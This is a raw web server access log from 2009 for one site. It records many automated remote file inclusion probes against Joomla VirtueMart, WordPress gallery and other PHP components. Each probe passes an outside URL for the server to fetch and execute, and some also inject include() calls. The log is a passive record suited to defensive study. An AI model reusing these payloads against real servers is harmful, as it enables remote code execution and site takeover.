218.232.105.116 - - [28/Jun/2009:23:27:00 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/intro.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:27:00 -0700] "GET /logs///administrator/components/com_virtuemart/intro.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:27:00 -0700] "GET //administrator/components/com_virtuemart/intro.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:27:22 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:29:58 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:30:02 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:30:02 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:31:43 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.138.156.3 - - [28/Jun/2009:23:33:16 -0700] "GET /logs//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.138.156.3 - - [28/Jun/2009:23:33:16 -0700] "GET /store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.138.156.3 - - [28/Jun/2009:23:33:16 -0700] "GET /logs/access.log//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:35:54 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:37:34 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:37:34 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:37:34 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:37:34 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:37:35 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:37:35 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:39:09 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:39:09 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:39:09 -0700] "GET /logs/access_090413.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:41:09 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:41:09 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:41:09 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:41:16 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:41:17 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:41:17 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:23:42:15 -0700] "GET /components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:23:42:15 -0700] "GET /logs//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:23:42:15 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:23:42:21 -0700] "GET /components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:23:42:21 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:23:42:21 -0700] "GET /logs//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:44:20 -0700] "GET /store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:44:20 -0700] "GET /logs//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:44:20 -0700] "GET /logs/access.log%20%20//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:44:22 -0700] "GET /store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:44:22 -0700] "GET /logs//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:44:22 -0700] "GET /logs/access.log%20%20//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.55.106.183 - - [28/Jun/2009:23:47:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:48:22 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop.cart.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:48:22 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop.cart.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:48:22 -0700] "GET /administrator/components/com_virtuemart/html/shop.cart.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:48:26 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop.cart.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:48:26 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop.cart.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:48:26 -0700] "GET /administrator/components/com_virtuemart/html/shop.cart.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:48:54 -0700] "GET /administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:48:56 -0700] "GET /logs/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:48:56 -0700] "GET /administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:48:56 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:48:58 -0700] "GET /logs/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:48:59 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.30.78.251 - - [28/Jun/2009:23:51:41 -0700] "GET /logs/?D=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:52:03 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:52:12 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
60.242.32.103 - - [28/Jun/2009:23:52:15 -0700] "GET /logs/access.log HTTP/1.1" 200 213356 "http://www.google.com.au/search?source=ig&hl=en&rlz=&=&q=filetype%3Alog+inurl%3B%22password.log%22&btnG=Google+Search&meta=lr%3D&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.vspeaking.com"
60.242.32.103 - - [28/Jun/2009:23:52:18 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.vspeaking.com"
60.242.32.103 - - [28/Jun/2009:23:52:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:46 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:46 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:47 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:47 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:47 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:47 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:57 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:58 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:58 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:58 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:58 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:52:58 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:54:15 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:54:16 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:54:16 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:54:51 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:54:51 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:54:51 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:56:04 -0700] "GET /logs/access.log//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:56:14 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:56:14 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:56:14 -0700] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:56:17 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:56:17 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:56:17 -0700] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:56:20 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:56:20 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:56:20 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:56:49 -0700] "GET /postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:56:50 -0700] "GET /logs/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:56:50 -0700] "GET /logs/access.log/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:57:17 -0700] "GET /postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:57:18 -0700] "GET /logs/access.log/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:23:57:20 -0700] "GET /logs/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:59:44 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:59:45 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:59:45 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:59:48 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:59:48 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:23:59:48 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.45.56.47 - - [29/Jun/2009:00:01:03 -0700] "GET /logs/access_090126.log//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.45.56.47 - - [29/Jun/2009:00:01:03 -0700] "GET /include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.45.56.47 - - [29/Jun/2009:00:01:03 -0700] "GET /logs//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
222.122.6.62 - - [29/Jun/2009:00:01:20 -0700] "GET /include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [29/Jun/2009:00:01:20 -0700] "GET /logs/access_090126.log%20//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [29/Jun/2009:00:01:20 -0700] "GET /logs//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.45.56.47 - - [29/Jun/2009:00:01:42 -0700] "GET /logs/access_090126.log%20//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
194.165.34.48 - - [29/Jun/2009:00:01:50 -0700] "GET /include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.48 - - [29/Jun/2009:00:01:50 -0700] "GET /logs//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.48 - - [29/Jun/2009:00:01:50 -0700] "GET /logs/access_090126.log//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
